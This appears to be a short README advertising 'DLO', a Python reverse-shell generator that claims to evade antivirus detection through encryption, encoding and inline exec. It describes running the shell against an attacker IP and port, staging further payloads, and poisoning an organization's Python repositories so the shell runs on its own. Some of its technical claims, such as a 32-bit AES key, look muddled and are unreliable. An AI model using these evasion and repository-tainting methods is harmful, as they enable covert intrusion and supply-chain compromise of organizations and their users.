Chang Tan Lister Lister Unlimited Cybersecurity Solutions, LLC. [email protected]
DLO generates a Pythonic reverse shell that as of July 29th, 2019, is undetectable on VirusTotal. It combines multiple won't-to-be-disclosed techniques (undiscloseable in detail) including but not limited to:
- "Command Segmentation"
- "AES Encryption" with a 32-bit key and a 16-bit initialization vector
- Base64 Encoding - It was a necessity
- Inline Python exec() functions, C asm() functions (will be added soon), Java/Jython, Cython, Ctypes
Please click this link for a demostration video of how to use
Currently you can, after you gain a foothold in organization
- Run the payload standalone.
- Replace the proof-of-concept code with a Metasploit python payload
- Taint/corrupt Python repositories: Locate the Python code repositories of a organization during a pentest and then copy-paste the entire code and append it to the bottom of the python module, guarantee auto-execution of the reverse shell when the code runs
- Use the payload as a stager to download additional payloads
- Use the payload against MacOS (MacBooks, iMacs, etc). They natively run Python 2.7.1
Run it as python darklordobama.py <attacker IP> <attacker listening port>